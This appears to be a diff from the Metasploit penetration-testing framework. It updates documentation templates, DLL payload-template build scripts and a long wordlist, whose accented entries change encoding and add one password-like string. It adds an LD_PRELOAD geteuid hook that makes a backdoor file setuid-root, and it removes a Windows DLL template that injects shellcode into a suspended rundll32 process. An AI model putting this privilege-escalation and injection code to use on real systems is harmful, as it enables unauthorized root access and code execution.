      - https://burmat.gitbook.io/security/hacking/domain-exploitation
-      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties 
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
@@ -0,0 +1,15 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <dlfcn.h>
+uid_t geteuid(void) {
+	static uid_t  (*old_geteuid)();
+	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
+	if ( old_geteuid() == 0 ) {
+		chown("$BACKDOORPATH", 0, 0);
+		chmod("$BACKDOORPATH", 04777);
+		unlink("/etc/ld.so.preload");
+	}
+	return old_geteuid();
+}
@@ -15,7 +15,7 @@
 <% end %>

 ## Module Ranking
-<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
+<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>

 **<%= items[:mod_rank_name] %>**

@@ -47,7 +47,7 @@
 <% end %>

 ## Module Traits
-<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
+<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>

 <% unless items[:mod_side_effects].empty? %>
 ### Side Effects
@@ -117,6 +117,13 @@

 <%= normalize_pull_requests(items[:mod_pull_requests]) %>

+<%- attacker_kb_references = normalize_attackerkb_references(items[:mod_refs]) %>
+<% unless attacker_kb_references.empty? %>
+## AttackerKB references
+
+<%= attacker_kb_references %>
+<% end %>
+
 <% unless items[:mod_refs].empty? %>
 ## References

@@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
 msf <%= mod.type %>(<%= mod.shortname %>) > generate
 ```

-To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
+To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).
@@ -0,0 +1,10 @@
+# PE Source Code
+This directory contains the source code for the PE executable templates.
+
+## Building DLLs
+Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`pe`).
@@ -0,0 +1,7 @@
+@echo off
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  build.bat
+  popd
+)
@@ -3,12 +3,13 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
+rc /v template.rc
+cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
 %COMSPEC% /c "%0" x86
 %COMSPEC% /c "%0" x64
-del  *.obj
+del  *.obj *.res
 move *.dll ..\..\..
-
@@ -1,5 +1,6 @@
-
+#ifndef SCSIZE
 #define SCSIZE 4096
+#endif
 unsigned char code[SCSIZE] = "PAYLOAD:";
 char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
 char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
@@ -0,0 +1,15 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rc /v /fo template.res ../dll/template.rc
+cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.exp *.lib *.res *.obj
+move *.dll ..\..\..
@@ -1,24 +0,0 @@
-#
-# XXX: NOTE: this will only compile the x86 version.
-#
-# To compile the x64 version, use:
-# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
-# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
-#
-
-if [ -z "$PREFIX" ]; then
-  PREFIX=i686-w64-mingw32 
-fi
-
-rm -f *.o *.dll
-$PREFIX-gcc -c template.c
-$PREFIX-windres -o rc.o template.rc
-$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
-rm -f junk.tmp
-$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
-rm -f base.tmp
-$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
-rm -f temp.exp
-
-$PREFIX-strip template_x86_windows.dll
-rm -f *.o
@@ -1,6 +1,3 @@
-#define SCSIZE 2048
-unsigned char code[SCSIZE] = "PAYLOAD:";
-
 #ifdef _MSC_VER
 	#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
 	#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
@@ -1,97 +0,0 @@
-#include <windows.h>
-#include "template.h"
-
-/* hand-rolled bzero allows us to avoid including ms vc runtime */
-void inline_bzero(void *p, size_t l)
-{
-
-           BYTE *q = (BYTE *)p;
-           size_t x = 0;
-           for (x = 0; x < l; x++)
-                     *(q++) = 0x00;
-}
-
-void ExecutePayload(void);
-
-BOOL WINAPI
-DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
-{
-    switch (dwReason)
-    {
-        case DLL_PROCESS_ATTACH:
-			ExecutePayload();
-            break;
-
-        case DLL_PROCESS_DETACH:
-            // Code to run when the DLL is freed
-            break;
-
-        case DLL_THREAD_ATTACH:
-            // Code to run when a thread is created during the DLL's lifetime
-            break;
-
-        case DLL_THREAD_DETACH:
-            // Code to run when a thread ends normally.
-            break;
-    }
-    return TRUE;
-}
-
-void ExecutePayload(void) {
-    int error;
-	PROCESS_INFORMATION pi;
-	STARTUPINFO si;
-	CONTEXT ctx;
-	DWORD prot;
-   LPVOID ep;
-
-	// Start up the payload in a new process
-	inline_bzero( &si, sizeof( si ));
-	si.cb = sizeof(si);
-
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
-	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
-		GetThreadContext(pi.hThread, &ctx);
-
-	   ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
-        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
-
-#ifdef _WIN64
-	   ctx.Rip = (DWORD64)ep;
-#else
-	   ctx.Eip = (DWORD)ep;
-#endif
-
-        SetThreadContext(pi.hThread,&ctx);
-
-        ResumeThread(pi.hThread);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-	}
-   // ExitProcess(0);
-   ExitThread(0);
-}
-
-/*
-typedef VOID
-(NTAPI *PIMAGE_TLS_CALLBACK) (
-    PVOID DllHandle,
-    ULONG Reason,
-    PVOID Reserved
-    );
-
-VOID NTAPI TlsCallback(
-      IN PVOID DllHandle,
-      IN ULONG Reason,
-      IN PVOID Reserved)
-{
-	__asm  ( "int3" );
-}
-
-ULONG _tls_index;
-PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
-IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
-*/
-
@@ -1,3 +0,0 @@
-EXPORTS
-DllMain@12
-
@@ -1,18 +0,0 @@
-
-LANGUAGE 9, 1
-
-
-VS_VERSION_INFO VERSIONINFO
- FILEVERSION 0,0,0,1
- PRODUCTVERSION 0,0,0,1
- FILEFLAGSMASK 0x17L
- FILEFLAGS 0x0L
- FILEOS 0x4L
- FILETYPE 0x2L
- FILESUBTYPE 0x0L
-BEGIN
-
-END
-
-#define RT_HTML  23
-
@@ -4,6 +4,7 @@ if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
@@ -274,8 +274,8 @@ abbreviating
 abbreviation
 abby
 abbye
-abbé
-abbés
+abbé
+abbés
 abc
 abc123
 abcd
@@ -975,7 +975,7 @@ adipose
 adiposes
 adirondack
 adirondacks
-adiós
+adiós
 adj
 adjacency
 adjacent
@@ -1573,7 +1573,7 @@ aidan
 aide
 aide-de-camp
 aide-memoires
-aide-mémoire
+aide-mémoire
 aided
 aider
 aides-de-camp
@@ -3006,7 +3006,7 @@ animistic
 animized
 animosity
 animus
-animé
+animé
 anion
 anionic
 anise
@@ -3615,10 +3615,10 @@ applicator
 applier
 appliers
 applique
-appliqué
-appliquéd
-appliquéing
-appliqués
+appliqué
+appliquéd
+appliquéing
+appliqués
 apply
 appoint
 appointee
@@ -4274,8 +4274,8 @@ arvy
 aryan
 aryanism
 aryn
-arête
-arêtes
+arête
+arêtes
 as
 asa
 asama
@@ -4618,7 +4618,7 @@ asturias
 astute
 astuteness
 asuncion
-asunción
+asunción
 asunder
 aswan
 asyllabic
@@ -4643,7 +4643,7 @@ atalanta
 atamelang
 atari
 ataturk
-atatürk
+atatürk
 atavism
 atavist
 atavistic
@@ -4742,7 +4742,7 @@ attached
 attacher
 attaches
 attachment
-attaché
+attaché
 attack
 attackable
 attacker
@@ -6141,7 +6141,7 @@ bartolomeo
 barton
 bartram
 barty
-bartók
+bartók
 baruch
 barvale
 barvallen
@@ -7880,7 +7880,7 @@ blast
 blaster
 blasting
 blastoff
-blasé
+blasé
 blat
 blatancy
 blatant
@@ -8433,7 +8433,7 @@ bogotified
 bogotifies
 bogotify
 bogotifying
-bogotá
+bogotá
 bogus
 bogy
 bogyman
@@ -8911,7 +8911,7 @@ botulinum
 botulinus
 botulism
 boucher
-bouclé
+bouclé
 boudicca
 boudoir
 bouffant
@@ -8962,13 +8962,13 @@ bourne
 bournemouth
 bourree
 bourses
-bourée
+bourée
 boustrophedon
 bout
 boutique
 boutonniere
-boutonnière
-boutonnières
+boutonnière
+boutonnières
 bouvier
 bouzouki
 bovary
@@ -9052,7 +9052,7 @@ boyscout
 boysenberry
 boyup
 bozo
-boötes
+boötes
 bp
 bpi
 bpoe
@@ -9435,7 +9435,7 @@ bribery
 bribie
 bric
 bric-a-brac
-bric-à-brac
+bric-à-brac
 brice
 brick
 brick-red
@@ -10472,7 +10472,7 @@ buzzer
 buzzing
 buzzword
 buzzy
-buñuel
+buñuel
 bx
 bxs
 by
@@ -10528,10 +10528,10 @@ byway
 byword
 byzantine
 byzantium
-bêche
-bête
-bêtes
-bêtise
+bêche
+bête
+bêtes
+bêtise
 c
 c.elegans
 c.lit.
@@ -10646,8 +10646,8 @@ caffeinated
 caffeine
 caftan
 cafutweni
-café
-cafés
+café
+cafés
 cage
 caged
 cager
@@ -10962,8 +10962,8 @@ canalization
 canalize
 canalling
 canape
-canapé
-canapés
+canapé
+canapés
 canard
 canaries
 canary
@@ -13334,11 +13334,11 @@ chutzpahs
 chuvash
 chweni
 chyme
-château
-châteaus
-châteaux
-châtelaine
-châtelaines
+château
+châteaus
+châteaux
+châtelaine
+châtelaines
 ci
 cia
 ciao
@@ -13840,15 +13840,15 @@ clewer
 cliburn
 cliche
 cliched
-cliché
-clichéd
-clichés
+cliché
+clichéd
+clichés
 click
 clicker
 clicking
 client
 clientele
-clientèle
+clientèle
 cliff
 cliff-hanger
 cliffdale
@@ -13951,7 +13951,7 @@ clogged
 clogging
 cloisonne
 cloisonnes
-cloisonné
+cloisonné
 cloister
 cloistral
 clomp
@@ -14968,7 +14968,7 @@ communing
 communion
 communique
 communiques
-communiqué
+communiqué
 communise
 communism
 communist
@@ -15196,8 +15196,8 @@ computerize
 computes
 computicket
 computing
-compère
-compères
+compère
+compères
 comrade
 comradeliest
 comradeliness
@@ -15241,7 +15241,7 @@ concentrator
 concentric
 concentrically
 concepcion
-concepción
+concepción
 concept
 conception
 conceptional
@@ -15504,8 +15504,8 @@ confrontation
 confrontational
 confrontationally
 confronter
-confrère
-confrères
+confrère
+confrères
 confucian
 confucianism
 confucius
@@ -15755,8 +15755,8 @@ consolidation
 consolidator
 consoling
 consomme
-consommé
-consommés
+consommé
+consommés
 consonance
 consonances
 consonant
@@ -16539,8 +16539,8 @@ cortisone
 cortland
 cortney
 corty
-cortège
-cortèges
+cortège
+cortèges
 corundum
 coruscate
 coruscation
@@ -16657,8 +16657,8 @@ coulis
 coulomb
 coulter
 coulthard
-coulée
-coulées
+coulée
+coulées
 council
 councillor
 councilman
@@ -16791,7 +16791,7 @@ couples
 couplet
 coupling
 coupon
-coupé
+coupé
 cour
 courage
 courageous
@@ -17506,8 +17506,8 @@ crowning
 crows
 croydon
 crozier
-croûton
-croûtons
+croûton
+croûtons
 crt
 crucial
 cruciate
@@ -17526,7 +17526,7 @@ crude
 crudeness
 crudites
 crudity
-crudités
+crudités
 cruel
 cruelled
 cruelling
@@ -17634,12 +17634,12 @@ crystallographer
 crystallographic
 crystallography
 crystie
-crèche
-crèches
-crème
-crêpe
-crêpes
-crêpey
+crèche
+crèches
+crème
+crêpe
+crêpes
+crêpey
 cs
 csa
 cse
@@ -18113,7 +18113,7 @@ czechoslovakian
 czechs
 czerniak
 czerny
-côte
+côte
 d
 da
 daantjie
@@ -18299,7 +18299,7 @@ damson
 dan
 dana
 danarand
-danaë
+danaë
 danbury
 dance
 danceable
@@ -19951,8 +19951,8 @@ derrik
 derril
 derrinallum
 derringer
-derrière
-derrières
+derrière
+derrières
 derron
 derry
 dersley
@@ -20447,7 +20447,7 @@ diamagnetic
 diamante
 diamanthoogte
 diamantina
-diamanté
+diamanté
 diameter
 diametric
 diametrical
@@ -21077,8 +21077,8 @@ discordant
 discorporate
 discorporated
 discotheque
-discothèque
-discothèques
+discothèque
+discothèques
 discount
 discountability
 discountable
@@ -21613,9 +21613,9 @@ divisor
 divorce
 divorcee
 divorcement
-divorcé
-divorcée
-divorcées
+divorcé
+divorcée
+divorcées
 divot
 divulge
 divvy
@@ -22000,7 +22000,7 @@ dopiness
 dopinesses
 doping
 doppelganger
-doppelgänger
+doppelgänger
 doppies
 doppler
 dopy
@@ -22077,7 +22077,7 @@ dorthea
 dorthy
 dortmund
 dory
-doré
+doré
 dos
 dosage
 dose
@@ -22553,7 +22553,7 @@ drowse
 drowsily
 drowsiness
 drowsy
-droëwors
+droëwors
 dru
 drub
 drubbed
@@ -22948,7 +22948,7 @@ duynefontein
 dvd
 dvina
 dvorak
-dvorák
+dvorák
 dwaal
 dwaalboom
 dwain
@@ -23034,33 +23034,33 @@ dzimauli
 dzongkha
 dzumeri
 dzungaria
-début
-débutante
-débutantes
-débuts
-débâcle
-débâcles
-déclassé
-déclassée
-décolletage
-décolletages
-décolleté
-décolletée
-décor
-décors
-découpage
-déjà
-démodé
-dénouement
-dépaysé
-dépaysée
-dérailleur
-dérailleurs
-déshabillé
-détente
-détentes
-dürer
-düsseldorf
+début
+débutante
+débutantes
+débuts
+débâcle
+débâcles
+déclassé
+déclassée
+décolletage
+décolletages
+décolleté
+décolletée
+décor
+décors
+découpage
+déjà
+démodé
+dénouement
+dépaysé
+dépaysée
+dérailleur
+dérailleurs
+déshabillé
+détente
+détentes
+dürer
+düsseldorf
 e
 e-commerce
 e-mail
@@ -24137,7 +24137,7 @@ elysia
 elysian
 elysium
 elyssa
-elysée
+elysée
 em
 ema
 emabheleni
@@ -24869,8 +24869,8 @@ entreatingly
 entreaty
 entrechat
 entrecote
-entrecôte
-entrecôtes
+entrecôte
+entrecôtes
 entree
 entrees
 entremets
@@ -24880,8 +24880,8 @@ entrepot
 entrepreneur
 entrepreneurial
 entrepreneurship
-entrepôt
-entrepôts
+entrepôt
+entrepôts
 entries
 entropic
 entropy
@@ -24890,8 +24890,8 @@ entry
 entryphone
 entryphones
 entryway
-entrée
-entrées
+entrée
+entrées
 entshonalanga
 entshongwe
 entumbane
@@ -25442,7 +25442,7 @@ ester
 estera
 esterase
 esterhazy
-esterházy
+esterházy
 esterpark
 estes
 estevan
@@ -26239,8 +26239,8 @@ expository
 expostulate
 expostulation
 exposure
-exposé
-exposés
+exposé
+exposés
 expound
 expounder
 express
@@ -26493,7 +26493,7 @@ fab
 fabe
 faber
 faberge
-fabergé
+fabergé
 fabian
 fabiano
 fabians
@@ -27073,10 +27073,10 @@ fays
 fayth
 faythe
 faze
-façade
-façades
-faïence
-faïences
+façade
+façades
+faïence
+faïences
 fbi
 fcc
 fd
@@ -27438,10 +27438,10 @@ fi
 fia
 fiance
 fiancee
-fiancé
-fiancée
-fiancées
-fiancés
+fiancé
+fiancée
+fiancées
+fiancés
 fiann
 fianna
 fiasco
@@ -28051,10 +28051,10 @@ flambes
 flamboyance
 flamboyancy
 flamboyant
-flambé
-flambéed
-flambéing
-flambés
+flambé
+flambéed
+flambéing
+flambés
 flame
 flame-proof
 flame-proofed
@@ -29111,7 +29111,7 @@ fosterer
 fostering
 fotomat
 foucault
-fouché
+fouché
 fought
 foul
 foul-mouth
@@ -29306,14 +29306,14 @@ franticness
 frants
 franz
 franzen
-françois
-françoise
+françois
+françoise
 frap
 frappe
 frappeed
 frappeing
 frappes
-frappé
+frappé
 frasco
 fraser
 fraserburg
@@ -29993,11 +29993,11 @@ fy
 fyi
 fynbos
 fynnland
-fête
-fêtes
-föhn
-führer
-führers
+fête
+fêtes
+föhn
+führer
+führers
 g
 g-string
 g-strings
@@ -30428,8 +30428,8 @@ garwin
 garwood
 gary
 garza
-garçon
-garçons
+garçon
+garçons
 gas
 gas-permeable
 gasbag
@@ -31012,7 +31012,7 @@ gettysburg
 getup
 gewgaw
 gewurztraminer
-gewürztraminer
+gewürztraminer
 geysdorp
 geyser
 gezangave
@@ -31316,10 +31316,10 @@ glaciological
 glaciologist
 glaciology
 glacis
-glacé
-glacéed
-glacéing
-glacés
+glacé
+glacéed
+glacéing
+glacés
 glad
 gladded
 gladden
@@ -32726,11 +32726,11 @@ grus
 grusky
 gruyere
 gruyeres
-gruyère
+gruyère
 gryphon
 grysvok
-grâce
-grünewald
+grâce
+grünewald
 gs
 gsa
 gsm
@@ -33098,8 +33098,8 @@ gyromagnetic
 gyroscope
 gyroscopic
 gyve
-gödel
-göteborg
+gödel
+göteborg
 h
 h2opolo
 ha
@@ -33137,8 +33137,8 @@ habitualness
 habituate
 habituation
 habitue
-habitué
-habitués
+habitué
+habitués
 hacienda
 hack
 hackable
@@ -36618,7 +36618,7 @@ hysterical
 hystericism
 hyundai
 hz
-héloise
+héloise
 i
 i.e.
 ia
@@ -38232,8 +38232,8 @@ inguinal
 ingunna
 ingvar
 ingwavuma
-ingénue
-ingénues
+ingénue
+ingénues
 inhabit
 inhabitable
 inhabitance
@@ -39844,8 +39844,8 @@ jakey
 jakie
 jakob
 jalapeno
-jalapeño
-jalapeños
+jalapeño
+jalapeños
 jalopy
 jalousie
 jam
@@ -39963,8 +39963,8 @@ jarad
 jard
 jardine
 jardiniere
-jardinière
-jardinières
+jardinière
+jardinières
 jareb
 jared
 jarful
@@ -40579,7 +40579,7 @@ jostle
 jostling
 josue
 josy
-josé
+josé
 jot
 jotted
 jotter
@@ -41766,8 +41766,8 @@ kinder
 kindergarten
 kindergartener
 kindergartner
-kindergärtner
-kindergärtners
+kindergärtner
+kindergärtners
 kindest
 kindhearted
 kindheartedness
@@ -42434,8 +42434,8 @@ krystal
 krystalle
 krystle
 krystyna
-króna
-krónur
+króna
+krónur
 ks
 kshatriya
 kt
@@ -42926,7 +42926,7 @@ lamport
 lamppost
 lamprey
 lampshade
-lamé
+lamé
 lan
 lana
 lanae
@@ -44646,8 +44646,8 @@ littleness
 littleton
 litton
 littoral
-littérateur
-littérateurs
+littérateur
+littérateurs
 liturgic
 liturgical
 liturgics
@@ -44939,7 +44939,7 @@ lombard
 lombardi
 lombardy
 lome
-lomé
+lomé
 lon
 lona
 london
@@ -45496,7 +45496,7 @@ luminescent
 luminosity
 luminous
 luminousness
-lumière
+lumière
 lumku
 lummox
 lump
@@ -45655,7 +45655,7 @@ lychgate
 lycopodium
 lycra
 lycurgus
-lycée
+lycée
 lyda
 lydenburg
 lydia
@@ -45858,8 +45858,8 @@ macos
 macpaint
 macquarie
 macrame
-macramé
-macramés
+macramé
+macramés
 macro
 macrobiotic
 macrobiotics
@@ -46414,7 +46414,7 @@ mallala
 mallapunyah
 mallard
 mallarme
-mallarmé
+mallarmé
 malleability
 malleable
 malleableness
@@ -46696,7 +46696,7 @@ manorial
 manpower
 manque
 manquzu
-manqué
+manqué
 mans
 mansard
 manse
@@ -46758,10 +46758,10 @@ manzengwenya
 manzi
 manzibomvu
 manzimahle
-manège
-manèged
-manèges
-manèging
+manège
+manèged
+manèges
+manèging
 mao
 maoism
 maoist
@@ -47448,7 +47448,7 @@ matimatolo
 matinee
 mating
 matins
-matinée
+matinée
 matisse
 matiwane
 matjeka
@@ -47540,8 +47540,8 @@ matzoh
 matzot
 matzoth
 matzotshweni
-matériel
-matériels
+matériel
+matériels
 mau
 maubane
 maud
@@ -47688,8 +47688,8 @@ mazourka
 mazurka
 mazy
 mazzini
-maître
-mañana
+maître
+mañana
 mb
 mba
 mbabane
@@ -51549,15 +51549,15 @@ mzomusha
 mzonga
 mzonyane
 mzotho
-mélange
-mémoire
-ménage
-métier
-métiers
-mêlée
-mêlées
-möbius
-münchhausen
+mélange
+mémoire
+ménage
+métier
+métiers
+mêlée
+mêlées
+möbius
+münchhausen
 n
 na
 naaco
@@ -51632,8 +51632,8 @@ naive
 naiveness
 naivete
 naivety
-naiveté
-naivetés
+naiveté
+naivetés
 nakamura
 nakayama
 naked
@@ -51939,13 +51939,13 @@ nazca
 nazi
 naziism
 nazism
-naïve
-naïvely
-naïveness
-naïveties
-naïvety
-naïveté
-naïvetés
+naïve
+naïvely
+naïveness
+naïveties
+naïvety
+naïveté
+naïvetés
 nb
 nba
 nbc
@@ -52136,8 +52136,8 @@ negligent
 negligibility
 negligible
 negligibly
-negligée
-negligées
+negligée
+negligées
 negotiability
 negotiable
 negotiant
@@ -54074,10 +54074,10 @@ nouakchott
 nougat
 nought
 noumea
-nouméa
+nouméa
 noun
 nounal
-nounéa
+nounéa
 noupoort
 nourish
 nourished
@@ -54431,10 +54431,10 @@ nzima
 nzimakazi
 nzokhulayo
 nzombane
-nè
-né
-née
-négligé
+nè
+né
+née
+négligé
 o
 oaf
 oafish
@@ -55069,7 +55069,7 @@ olympian
 olympic
 olympie
 olympus
-olé
+olé
 om
 omagh
 omaha
@@ -55933,7 +55933,7 @@ outrigger
 outright
 outrun
 outrunning
-outré
+outré
 outscore
 outsell
 outset
@@ -57060,7 +57060,7 @@ paranoiac
 paranoid
 paranormal
 paranormally
-paraná
+paraná
 parapet
 paraphernalia
 paraphrase
@@ -57357,8 +57357,8 @@ passwd
 password
 password1
 passworded
-passé
-passée
+passé
+passée
 past
 pasta
 paste
@@ -59360,10 +59360,10 @@ pizzazz
 pizzeria
 pizzicati
 pizzicato
-piñata
-piñatas
-piñon
-piñons
+piñata
+piñatas
+piñon
+piñons
 pj
 pk
 pkg
@@ -59854,7 +59854,7 @@ poignancy
 poignant
 poikilothermic
 poincare
-poincaré
+poincaré
 poinciana
 poincianas
 poindexter
@@ -60303,8 +60303,8 @@ portie
 portiere
 porting
 portion
-portière
-portières
+portière
+portières
 portland
 portliness
 portly
@@ -61002,10 +61002,10 @@ premise
 premiss
 premium
 premix
-première
-premièred
-premières
-premièring
+première
+premièred
+premières
+premièring
 premolar
 premonition
 premonitory
@@ -61923,10 +61923,10 @@ protrusively
 protrusiveness
 protuberance
 protuberant
-protégé
-protégée
-protégées
-protégés
+protégé
+protégée
+protégées
+protégés
 proud
 proudhon
 proust
@@ -61946,7 +61946,7 @@ provence
 provender
 provenience
 provenly
-provençal
+provençal
 prover
 proverb
 proverbial
@@ -62019,10 +62019,10 @@ pryce
 pryer
 prying
 pryor
-précis
-précised
-précises
-précising
+précis
+précised
+précises
+précising
 ps
 psalm
 psalmist
@@ -62429,10 +62429,10 @@ purvey
 purveyance
 purveyor
 purview
-purée
-puréed
-puréeing
-purées
+purée
+puréed
+puréeing
+purées
 pus
 pusan
 pusey
@@ -62580,10 +62580,10 @@ pyxidia
 pyxidium
 pyxis
 pzazz
-pâté
-pères
-pétain
-pôrto
+pâté
+pères
+pétain
+pôrto
 q
 q-tips.
 q-town
@@ -63018,6 +63018,7 @@ r1
 r1s
 r4
 r4s
+r50$K28vaIFiYxaY
 ra
 raapkraal
 rab
@@ -63215,7 +63216,7 @@ ragingly
 raglan
 ragnar
 ragnarok
-ragnarök
+ragnarök
 ragout
 rags-to-riches
 ragtag
@@ -64150,7 +64151,7 @@ recharter
 recheck
 recherche
 recherches
-recherché
+recherché
 rechristen
 recidivism
 recidivist
@@ -65462,7 +65463,7 @@ repute
 reputed
 reputes
 reputing
-repêchage
+repêchage
 request
 requested
 requester
@@ -66490,7 +66491,7 @@ risorgimento
 risotto
 rispark
 risque
-risqué
+risqué
 rissole
 rita
 ritalin
@@ -67101,7 +67102,7 @@ rostropovich
 rostrum
 roswell
 rosy
-rosé
+rosé
 rot
 rot-gut
 rota
@@ -67211,8 +67212,8 @@ routinize
 rouvin
 roux
 rouxville
-roué
-roués
+roué
+roués
 rove
 rover
 roving
@@ -67604,13 +67605,13 @@ ryon
 rysmierbult
 ryukyu
 ryun
-régime
-régimes
-résumé
-résumés
-réunion
-rôle
-rôles
+régime
+régimes
+résumé
+résumés
+réunion
+rôle
+rôles
 s
 sa
 saa
@@ -68354,10 +68355,10 @@ saussure
 saute
 sauterne
 sauternes
-sauté
-sautéed
-sautéing
-sautés
+sauté
+sautéed
+sautéing
+sautés
 sauveur
 savable
 savage
@@ -68721,7 +68722,7 @@ schrod
 schrodinger
 schroeder
 schroedinger
-schrödinger
+schrödinger
 schtick
 schubert
 schuinshoogte
@@ -70196,12 +70197,12 @@ seychelles
 seyfert
 seymour
 sezela
-señor
-señora
-señoras
-señores
-señorita
-señoritas
+señor
+señora
+señoras
+señores
+señorita
+señoritas
 sf
 sforzandi
 sforzando
@@ -72452,7 +72453,7 @@ smutting
 smutty
 smyrna
 smythesdale
-smörgåsbord
+smörgåsbord
 sn
 snaaks
 snack
@@ -72823,13 +72824,13 @@ soi
 soi-disant
 soigne
 soignee
-soigné
+soigné
 soil
 soiled
 soiling
 soiree
-soirée
-soirées
+soirée
+soirées
 sojourn
 sojourner
 sojourning
@@ -73126,8 +73127,8 @@ sottish
 sou
 soubriquet
 souffle
-soufflé
-soufflés
+soufflé
+soufflés
 sough
 soughing
 soughs
@@ -73161,8 +73162,8 @@ soup
 soupcon
 souphanouvong
 soupy
-soupçon
-soupçons
+soupçon
+soupçons
 sour
 source
 sourced
@@ -76890,9 +76891,9 @@ szechuan
 szechwan
 szilard
 szymborska
-são
-séance
-séances
+são
+séance
+séances
 t
 t-bone
 t-junction
@@ -77263,7 +77264,7 @@ tannery
 tannest
 tanney
 tannhauser
-tannhäuser
+tannhäuser
 tannie
 tannin
 tanning
@@ -78405,7 +78406,7 @@ thespis
 thessalonian
 thessalonians
 thessaloniki
-thessaloníki
+thessaloníki
 thessaly
 theta
 theunissen
@@ -79406,7 +79407,7 @@ tomorrow
 tompkins
 tomsk
 tomtit
-tomé
+tomé
 ton
 tonal
 tonality
@@ -79700,7 +79701,7 @@ touchstone
 touchwood
 touchy
 touchy-feely
-touché
+touché
 tough
 tough-minded
 toughen
@@ -81328,10 +81329,10 @@ tzarist
 tzatziki
 tzeltal
 tzigane
-tête
-tête-bêche
-tête-à-tête
-tórshavn
+tête
+tête-bêche
+tête-à-tête
+tórshavn
 u
 uar
 uart
@@ -83891,7 +83892,7 @@ valvoline
 valvular
 valvules
 valyland
-valéry
+valéry
 vamoose
 vamp
 vamped
@@ -84138,8 +84139,8 @@ velvet
 velveted
 velveteen
 velvety
-velásquez
-velázquez
+velásquez
+velázquez
 venables
 venal
 venality
@@ -84508,8 +84509,8 @@ victualer
 victualler
 victualling
 vicuna
-vicuña
-vicuñas
+vicuña
+vicuñas
 vida
 vidal
 vide
@@ -84711,7 +84712,7 @@ virulence
 virulent
 virus
 vis
-vis-à-vis
+vis-à-vis
 visa
 visage
 visagiepark
